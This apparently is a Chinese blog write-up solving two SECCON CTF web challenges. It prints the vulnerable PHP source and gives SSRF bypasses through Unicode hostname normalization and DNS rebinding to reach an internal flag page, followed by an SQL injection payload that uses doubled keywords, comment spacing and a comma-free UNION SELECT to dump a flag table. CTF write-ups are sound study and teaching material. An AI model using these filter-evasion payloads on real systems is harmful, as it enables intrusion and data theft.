1. Option-Cmd-U

题目描述:No more "View Page Source"!

Image.png

打开题目可以看到,是一个在线查看网页源代码的功能
先查看一下index.php,有关键提示

<!-- src of this PHP script: /index.php?action=source -->
<!-- the flag is in /flag.php, which permits access only from internal network :-) -->
<!-- this service is running on php-fpm and nginx. see /docker-compose.yml -->

首先查看 /index.php?action=source ,关键代码如下

<?php
if ($_GET['action'] === "source"){
    highlight_file(__FILE__);
    die();
}
?>
<?php
if (isset($_GET['url'])){
    $url = filter_input(INPUT_GET, 'url');
    $parsed_url = parse_url($url);                        
    if($parsed_url["scheme"] !== "http"){
    // only http: should be allowed. 
        echo 'URL should start with http!';
    } 
    else if (gethostbyname(idn_to_ascii($parsed_url["host"], 0, INTL_IDNA_VARIANT_UTS46)) === gethostbyname("nginx")) {
    // local access to nginx from php-fpm should be blocked.
        echo 'Oops, are you a robot or an attacker?';
    } else {
    // file_get_contents needs idn_to_ascii(): https://stackoverflow.com/questions/40663425/
        highlight_string(file_get_contents(idn_to_ascii($url, 0, INTL_IDNA_VARIANT_UTS46),
            false,
            stream_context_create(array(
                'http' => array(
                    'follow_location' => false,
                    'timeout' => 2
                )
            ))));
    }
}
?>

再看第二个 flag.php

Forbidden.Your IP: 172.25.0.1

然后是 docker-compose.yml

version: '3'
services:
    nginx:
        (...ommitted...)
    php-fpm:
        (...ommitted...

解法一:
利用Unicode(参考us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization)绕过

  1. http://nginx:80/flag.php
  2. http://@nginx/flag.php
  3. http://nginx/flag.php

Image3.png

解法二:
可以看到 flag.php 有一个Forbidden IP。尝试访问,得到返回值如下

Image1.png

爆破内网IP地址,在 172.25.0.3 时得到以下回显

Image2.png

然后使用DNS Rebinding

localhost.my_server A 172.25.0.3
localhost.my_server A (my_server_IP_address)

最后访问自己的服务器,得到flag
GET /?url=http://lamber.xyz/flag.php

2. web_search

题目描述:Get a hidden message! Let's find a hidden message using the search system on the site.

常规sql测试
input: 1 --> (1)text
input: 1' --> (1')Error
input: 1'or 1=1# --> (1'1=1#)Error --> 可以看出来过滤了空格和or(以暴力删除的方式)
input: 1'oorr/**/1=1# --> (1'or/**/1=1#)The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more! --> 利用双写or跟注释符绕过过滤,得到第一部分flag。

去查询flag表
查询过程中发现过滤了逗号
最终payload:
oorr/**/1=0/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)/**/AS/**/a/**/JOIN/**/(SELECT/**/*/**/from/**/flag)AS/**/b/**/JOIN/**/(SELECT/**/1)/**/ AS/**/c;# --> You_Win_Yeah}

Last modification:January 7th, 2020 at 11:49 pm
给肥宅一点零花钱买可乐叭 (゜-゜)つロ